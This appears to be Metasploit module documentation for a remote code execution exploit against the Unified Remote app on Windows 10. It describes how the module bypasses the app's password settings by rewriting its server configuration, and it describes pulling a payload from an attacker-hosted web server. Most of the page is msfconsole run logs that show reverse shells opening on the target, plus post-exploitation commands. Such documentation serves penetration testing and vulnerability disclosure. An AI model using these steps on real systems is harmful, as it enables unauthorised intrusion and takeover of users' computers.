Vulnerable Application
This module utilizes the Unified Remote remote control protocol to type out and deploy a payload. The remote control protocol can be configured to have no passwords, a group password, or individual user accounts. If the web page is accessible, the access control is set to no password for exploitation, then reverted. If the web page is not accessible, exploitation will be tried blindly.
This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.
There are two methods to run a payload:
push method. This method pushes the payload (as if you were typing it) to the prompt. If you have a very small payload, or are just running a simple command, this would be fine. However, since we are running a binary payload which has been base64 encoded, this method usually took minutes to complete. Since Windows needs to be unlocked, the assumption is a user is there, and watching a payload be typed on the screen for minutes seemed unacceptable. Also, if the user clicks the mouse or hits a key on the keyboard, the payload will not finish or corrupt. This method was pulled from the final module as it didn't seem likely to succeed and was not feasbile outside of a testing environment.
pull method. This method starts a web server on the Metasploit host, and types out the command to pull and execute the payload. Since the URL is typically short, this method proved to be reliable and quick.
Version 3.11.0.2483 can be downloaded from unifiedremote.com
Verification Steps
Install the application
Start msfconsole
Do: use exploit/windows/misc/unified_remote_rce
Set rhost and lhost as required.
Do: run
You should get a shell.
Options
WEBSERVER
The port the web server is running on. Defaults to 9510
CLIENTNAME
The name of the client device to use. This shows up in the Unified Remote logs. If empty A random android based name is chosen. Defaults to ``
SLEEP
The length of time to sleep between each command, this gives the remote program time to process the command on screen. Defaults to 1 second.
PATH
Where to temporarily store the payload. Defaults to c:\\Windows\\Temp\\
VISIBLE
If set to true, uses a 'standard' method of typing to the screen. If set to false utilizes a 'pro' feature of unified remote to execute a script in the background. Defaults to false
Scenarios
Version 3.11.0.2483 on Windows 10, No authentication, visible false
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > run
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-ASvxWyO708Rv4x0j
[*] 2.2.2.2:9512 - Retrieving server config
[+] 2.2.2.2:9512 - No security enabled
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Loading Unified.Command
[*] 2.2.2.2:9512 - Updating Unified.Command
[*] 2.2.2.2:9512 - Sending payload
[*] 2.2.2.2:9512 - Executing script
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50052) at 2022-09-18 19:00:33 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\U4culUYTuG.exe' on the target
Shell Banner:
C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>
Version 3.11.0.2483 on Windows 10, No authentication, visible true
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-s5IbpVuRf1MJzqRs
[*] 2.2.2.2:9512 - Retrieving server config
[+] 2.2.2.2:9512 - No security enabled
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59233) at 2022-09-08 16:47:20 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\jhy5cTqRs.exe' on the target
Shell Banner:
C:\Users\windows>whoami
whoami
win10prolicense\windows
C:\Users\windows>systeminfo
systeminfo
Host Name: WIN10PROLICENSE
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.16299 N/A Build 16299
Version 3.11.0.2483 on Windows 10, group authentication, visible true
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-ergZhp49nDBmGXz8
[*] 2.2.2.2:9512 - Retrieving server config
[*] 2.2.2.2:9512 - anonymous mode enabled, password required, bypassing
[*] 2.2.2.2:9512 - Uploading new server config
[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] 2.2.2.2:9512 - Reverting security mode
[*] 2.2.2.2:9512 - Uploading new server config
[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59596) at 2022-09-08 16:50:21 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\lqVUQTKtxuSD1mm.exe' on the target
Shell Banner:
C:\Users\windows>
Version 3.11.0.2483 on Windows 10, user authentication, visible true
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-Mmw9X2FSLLPzJk6t
[*] 2.2.2.2:9512 - Retrieving server config
[*] 2.2.2.2:9512 - users mode enabled, password required, bypassing
[*] 2.2.2.2:9512 - Uploading new server config
[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] 2.2.2.2:9512 - Reverting security mode
[*] 2.2.2.2:9512 - Uploading new server config
[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59932) at 2022-09-08 16:53:05 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\2NzuxPbY6fGK9FdNy.exe' on the target
Shell Banner:
C:\Users\windows>
Version 3.11.0.2483 on Windows 10, no authentication, no web server access, visible true
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-EIC1Bc3pwL4U4Pnj
[*] 2.2.2.2:9512 - Retrieving server config
[-] 2.2.2.2:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:60829) at 2022-09-08 17:00:30 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\QD7V9rLaWUwvPIY.exe' on the target
Shell Banner:
C:\Users\windows>
Version 3.11.0.2483 on Windows 10, user authentication, no web server access, visible true
This will fail.
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-iJP3rW13dKjtf8Xz
[*] 2.2.2.2:9512 - Retrieving server config
[-] 2.2.2.2:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\tapEZnGskY.exe' on the target
[*] Exploit completed, but no session was created.
